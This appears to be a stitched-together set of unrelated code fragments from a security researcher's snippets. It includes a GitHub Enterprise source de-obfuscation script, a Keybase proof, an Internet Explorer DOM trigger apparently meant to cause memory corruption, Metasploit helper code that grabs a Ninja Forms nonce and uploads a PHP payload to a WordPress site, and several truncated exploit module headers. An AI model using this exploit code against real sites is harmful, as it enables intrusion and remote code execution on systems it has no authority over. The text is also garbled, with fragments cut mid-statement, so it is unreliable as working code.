#!/usr/bin/ruby
#
# This tool is only used to "decrypt" the github enterprise source code.
#
# Run in the /data directory of the instance.
require "zlib"
require "byebug"
KEY = "This obfuscation is intended to discourage GitHub Enterprise customers "+
<script>
// Case matters, see lib/msf/core/constants.rb
// All of these should match up with constants in ::Msf::HttpClients
var clients_opera = "Opera";
var clients_ie = "MSIE";
var clients_ff = "Firefox";
var clients_chrome = "Chrome";
var clients_safari = "Safari";
### Keybase proof
I hereby claim:
* I am wchen-r7 on github.
* I am wchenr7 (https://keybase.io/wchenr7) on keybase.
* I have a public key whose fingerprint is 4D08 AF54 0F66 C184 3C7D 1942 8048 8089 2F97 A3F7
To claim this, I am signing this object:
<html>
<script>
function trigger()
{
  var id_0 = document.createElement("sup");
  var id_1 = document.createElement("audio");
  document.body.appendChild(id_0);
  document.body.appendChild(id_1);
  id_1.applyElement(id_0);
donkeu
def fetch_ninja_form_nonce
  uri = normalize_uri(target_uri.path, datastore['FORM_PATH'])
  res = send_request_cgi(
    'method' => 'GET',
    'uri' => uri
  )
  puts res.body
  fail_with Failure::UnexpectedReply, 'Failed to acquire a nonce' unless res && res.code == 200
  res.body[/var nfFrontEnd = \{"ajaxNonce":"([a-zA-Z0-9]+)"/i, 1]
def generate_mime_message(payload_name, nonce)
  puts "--- You have nonce: #{nonce.inspect}"
  data = Rex::MIME::Message.new
  data.add_part('nf_async_upload', nil, nil, 'form-data; name="action"')
  data.add_part(nonce, nil, nil, 'form-data; name="security"')
  data.add_part(payload.encoded, 'application/x-php', nil, "form-data; name=\"#{Rex::Text.rand_text_alpha(10)}\"; filename=\"#{payload_name}\"")
  data
end
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpServer::HTML
  def initialize(info={})
    super(update_info(info,
      'Name' => "IE test",
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  def initialize(info={})
    super(update_info(info,
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
load "./lib/msf/core/exploit/exe.rb"
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote